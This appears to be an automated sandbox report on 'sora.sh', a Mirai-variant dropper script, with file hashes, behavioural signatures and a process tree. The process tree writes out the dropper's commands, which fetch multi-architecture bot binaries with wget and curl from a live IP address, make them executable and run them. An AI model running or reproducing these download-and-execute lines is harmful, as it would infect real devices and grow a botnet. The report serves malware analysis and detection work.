Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
29-08-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
sora.sh
-
Size
1KB
-
MD5
4bad6b7a8f3a112f1e8a64415b2c5e57
-
SHA1
80386ebec3b511cd2a07da88e300a62590b8d889
-
SHA256
4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
-
SHA512
da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Contacts a large (18915) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/robben 739 robben /tmp/robben 746 robben /tmp/robben 752 robben /tmp/robben 769 robben /tmp/robben 788 robben /tmp/robben 815 robben /tmp/robben 825 robben /tmp/robben 864 robben /tmp/robben 870 robben /tmp/robben 876 robben -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-2.dat upx behavioral4/files/fstream-3.dat upx behavioral4/files/fstream-5.dat upx -
Reads runtime system information 32 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/418/exe robben File opened for reading /proc/757/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/700/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/753/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/873/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/686/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/711/exe robben File opened for reading /proc/783/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/675/exe robben File opened for reading /proc/707/exe robben File opened for reading /proc/706/exe robben File opened for reading /proc/779/exe robben File opened for reading /proc/701/exe robben File opened for reading /proc/705/exe robben File opened for reading /proc/708/exe robben File opened for reading /proc/715/exe robben File opened for reading /proc/831/exe robben File opened for reading /proc/866/exe robben File opened for reading /proc/872/exe robben File opened for reading /proc/669/exe robben File opened for reading /proc/672/exe robben File opened for reading /proc/676/exe robben -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.sh4 curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm7 wget
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:708 -
/usr/bin/wgetwget http://154.216.17.67/bins/sora.x862⤵
- Writes file to tmp directory
PID:712
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/catcat sora.x862⤵PID:737
-
-
/bin/chmodchmod +x robben sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:738
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:739
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mips2⤵
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mips2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/catcat sora.mips2⤵PID:744
-
-
/bin/chmodchmod +x robben sora.mips sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:745
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:746
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:748
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/catcat sora.mpsl2⤵PID:750
-
-
/bin/chmodchmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:751
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:752
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm42⤵PID:756
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:760
-
-
/bin/catcat sora.arm42⤵PID:767
-
-
/bin/chmodchmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:768
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:769
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm52⤵
- Writes file to tmp directory
PID:772
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/catcat sora.arm52⤵PID:784
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:786
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:788
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm62⤵
- Writes file to tmp directory
PID:790
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/catcat sora.arm62⤵PID:812
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:813
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:815
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm72⤵
- Writes file to tmp directory
PID:819
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/catcat sora.arm72⤵PID:823
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt2⤵PID:824
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/catcat sora.ppc2⤵PID:862
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x862⤵PID:863
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:864
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:866
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/catcat sora.m68k2⤵PID:868
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x862⤵PID:869
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:870
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.sh42⤵
- Writes file to tmp directory
PID:872
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/catcat sora.sh42⤵PID:874
-
-
/bin/chmodchmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x862⤵PID:875
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
PID:876
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5bcff8f405bdd93b8488e6f6aca117a32
SHA18b32a1dea70be2c76830e3808f70ad62eb3b1250
SHA25667180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
SHA5125d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a
-
Filesize
31KB
MD5131fc41fbe66493277e3155f50b9fce5
SHA10bbb17cb882e34dc82e51862f8245f3187664beb
SHA256d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f
SHA512de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247
-
Filesize
33KB
MD58652e70ebc913d0078f59b2526a40d36
SHA11227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4
SHA256cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf
SHA512ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3
-
Filesize
212B
MD545e588171939a0780c48755918b1cd74
SHA16c33e64b1a43fb6752026fd1254cac740e7c3243
SHA256770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
SHA512fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770
-
Filesize
27KB
MD500d6529558e66184baaf1b0f21e59739
SHA13b9db5227c48f501573ea9b626c5c765a17e7c61
SHA256fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d
SHA51249f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb
-
Filesize
71KB
MD5a0b83eba33da68f09402235338d316a8
SHA115f3e890997e3b7f21c16eb1b0462bdf4ed11d61
SHA256eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507
SHA5122346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79